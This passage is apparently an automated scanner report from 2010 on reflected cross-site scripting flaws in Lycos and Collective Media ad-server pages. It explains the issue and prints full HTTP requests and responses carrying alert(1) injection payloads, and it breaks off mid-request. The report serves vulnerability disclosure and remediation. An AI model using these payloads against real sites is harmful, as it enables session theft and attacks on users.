1.365. http://peoplesearch.lycos.com/bootstrap.js [diktfc cookie]

1.366. http://peoplesearch.lycos.com/bootstrap.js [diktfc cookie]

1.367. http://peoplesearch.lycos.com/frontdoor [diktfc cookie]

1.368. http://peoplesearch.lycos.com/frontdoor [diktfc cookie]

1.369. http://peoplesearch.lycos.com/index.php [diktfc cookie]

1.370. http://peoplesearch.lycos.com/index.php [diktfc cookie]

1.371. http://search.lycos.com/ [diktfc cookie]

1.372. http://search.lycos.com/ [diktfc cookie]

1.373. http://search.lycos.com/bootstrap.js [diktfc cookie]

1.374. http://search.lycos.com/bootstrap.js [diktfc cookie]

1.375. http://search.lycos.com/default.asp [diktfc cookie]

1.376. http://search.lycos.com/default.asp [diktfc cookie]

1.377. http://search.lycos.com/image/ [diktfc cookie]

1.378. http://search.lycos.com/image/ [diktfc cookie]

1.379. http://search.lycos.com/video/ [diktfc cookie]

1.380. http://search.lycos.com/video/ [diktfc cookie]



1. Cross-site scripting (reflected)
There are 380 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://a.collective-media.net/ad/cm.idg_b2c/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/cm.idg_b2c/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fa4f7<script>alert(1)</script>eae69146b28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adfa4f7<script>alert(1)</script>eae69146b28/cm.idg_b2c/ HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal; optout=1; JY57=opt_out;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 69
Date: Sun, 12 Dec 2010 14:26:56 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

unknown path /adfa4f7<script>alert(1)</script>eae69146b28/cm.idg_b2c/

1.2. http://a.collective-media.net/ad/idgt.lycos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/idgt.lycos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27ca2<script>alert(1)</script>2c491182556 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad27ca2<script>alert(1)</script>2c491182556/idgt.lycos/;tile=1;sz=728x90;ord=123456789?\ HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal; optout=1; JY57=opt_out;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 109
Date: Sun, 12 Dec 2010 14:26:55 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

unknown path /ad27ca2<script>alert(1)</script>2c491182556/idgt.lycos/;tile=1;cmw=nurl;sz=728x90;ord=123456789

1.3. http://a.collective-media.net/adj/cm.idg_b2c/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.idg_b2c/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbf0b'-alert(1)-'46a749859b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.idg_b2cdbf0b'-alert(1)-'46a749859b1/;sz=728x90;ord=5241744? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 435
Date: Sun, 12 Dec 2010 14:26:39 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:39 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.idg_b2cdbf0b'-alert(1)-'46a749859b1/;sz=728x90;net=cm;ord=5241744;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.4. http://a.collective-media.net/adj/cm.idg_b2c/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.idg_b2c/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3623'-alert(1)-'5d6c2e0b2b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.idg_b2c/;sz=728x90;ord=5241744?&f3623'-alert(1)-'5d6c2e0b2b0=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 439
Date: Sun, 12 Dec 2010 14:26:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:38 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.idg_b2c/;sz=728x90;net=cm;ord=5241744?&f3623'-alert(1)-'5d6c2e0b2b0=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.5. http://a.collective-media.net/adj/cm.idg_b2c/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.idg_b2c/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e57e3'-alert(1)-'64cfe680192 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.idg_b2c/;sz=728x90;ord=5241744?e57e3'-alert(1)-'64cfe680192 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 436
Date: Sun, 12 Dec 2010 14:26:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:38 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.idg_b2c/;sz=728x90;net=cm;ord=5241744?e57e3'-alert(1)-'64cfe680192;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.6. http://a.collective-media.net/adj/idgt.lycos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.lycos/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93955'-alert(1)-'f68ab19aedd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.lycos93955'-alert(1)-'f68ab19aedd/;tile=1;sz=728x90;ord=123456789? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 446
Date: Sun, 12 Dec 2010 14:26:39 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:39 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.lycos93955'-alert(1)-'f68ab19aedd/;tile=1;sz=728x90;net=idgt;ord=123456789;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.7. http://a.collective-media.net/adj/idgt.lycos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.lycos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7e41'-alert(1)-'e57b49161fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.lycos/;tile=1;sz=728x90;ord=123456789?&c7e41'-alert(1)-'e57b49161fd=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Date: Sun, 12 Dec 2010 14:26:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:38 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.lycos/;tile=1;sz=728x90;net=idgt;ord=123456789?&c7e41'-alert(1)-'e57b49161fd=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.8. http://a.collective-media.net/adj/idgt.lycos/ [tile parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.lycos/

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56a4b'-alert(1)-'bb4ad577c5f was submitted in the tile parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.lycos/;tile=1;sz=728x90;ord=123456789?56a4b'-alert(1)-'bb4ad577c5f HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Sun, 12 Dec 2010 14:26:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:38 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.lycos/;tile=1;sz=728x90;net=idgt;ord=123456789?56a4b'-alert(1)-'bb4ad577c5f;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.9. http://a.collective-media.net/cmadj/idgt.lycos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/idgt.lycos/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d086f'-alert(1)-'0c5afc10a60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadjd086f'-alert(1)-'0c5afc10a60/idgt.lycos/;tile=1;sz=728x90;net=idgt;ord=123456789;env=ifr;ord1=795724;cmpgurl=http%253A//mail.lycos.com/lycos/Index.lycos? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 12 Dec 2010 14:26:39 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
Content-Length: 7161

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-75049847_1292163999","http://ad.doubleclick.net/adjd086f'-alert(1)-'0c5afc10a60/idgt.lycos/;net=idgt;u=,idgt-75049847_1292163999,,webdevelopment,;;tile=1;cmw=owl;sz=728x90;net=idgt;env=ifr;ord1=795724;contx=webdevelopment;dc=d;btg=;ord=123456789?","728","90",false);</scr'+'ipt>
...[SNIP]...

1.10. http://a.collective-media.net/cmadj/idgt.lycos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/idgt.lycos/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f15f'-alert(1)-'146c6c088c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/idgt.lycos9f15f'-alert(1)-'146c6c088c2/;tile=1;sz=728x90;net=idgt;ord=123456789;env=ifr;ord1=795724;cmpgurl=http%253A//mail.lycos.com/lycos/Index.lycos? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 12 Dec 2010 14:26:39 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
Content-Length: 7153

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-61396396_1292163999","http://ad.doubleclick.net/adj/idgt.lycos9f15f'-alert(1)-'146c6c088c2/;net=idgt;u=,idgt-61396396_1292163999,,webdevelopment,;;tile=1;sz=728x90;net=idgt;env=ifr;ord1=795724;contx=webdevelopment;dc=d;btg=;ord=123456789?","728","90",false);</scr'+'ipt>
...[SNIP]...

1.11. http://a.collective-media.net/cmadj/idgt.lycos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/idgt.lycos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 717c5'-alert(1)-'3504f397cdd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/idgt.lycos/;tile=1;sz=728x90;net=idgt;ord=123456789;&717c5'-alert(1)-'3504f397cdd=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal; optout=1; JY57=opt_out;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 12 Dec 2010 14:26:57 GMT
Content-Length: 7117
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
pt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-96303716_1292164017","http://ad.doubleclick.net/adj/idgt.lycos/;net=idgt;u=,idgt-96303716_1292164017,,none,;;tile=1;sz=728x90;net=idgt;&717c5'-alert(1)-'3504f397cdd=1;contx=none;dc=d;btg=;ord=123456789?","728","90",false);</scr'+'ipt>
...[SNIP]...

1.12. http://a.collective-media.net/cmadj/idgt.lycos/ [tile parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/idgt.lycos/

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49010'-alert(1)-'a3461bb3ff4 was submitted in the tile parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/idgt.lycos/;tile=49010'-alert(1)-'a3461bb3ff4 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 12 Dec 2010 14:26:38 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
Content-Length: 7074

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-3700236_1292163998","http://ad.doubleclick.net/adj/idgt.lycos/;net=idgt;u=,idgt-3700236_1292163998,,none,;;tile=49010'-alert(1)-'a3461bb3ff4;contx=none;dc=d;btg=?","0","0",false);</scr'+'ipt>
...[SNIP]...

1.13. http://advertising.lycos.com/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 842fd"><script>alert(1)</script>7285f314683 was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=multi&cat=images842fd"><script>alert(1)</script>7285f314683 HTTP/1.1
Host: advertising.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:17 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_images842fd"><script>alert(1)</script>7285f314683&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.14. http://advertising.lycos.com/ [tab parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ce66"><script>alert(1)</script>ebf8b4cdc1d was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=multi9ce66"><script>alert(1)</script>ebf8b4cdc1d&cat=images HTTP/1.1
Host: advertising.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
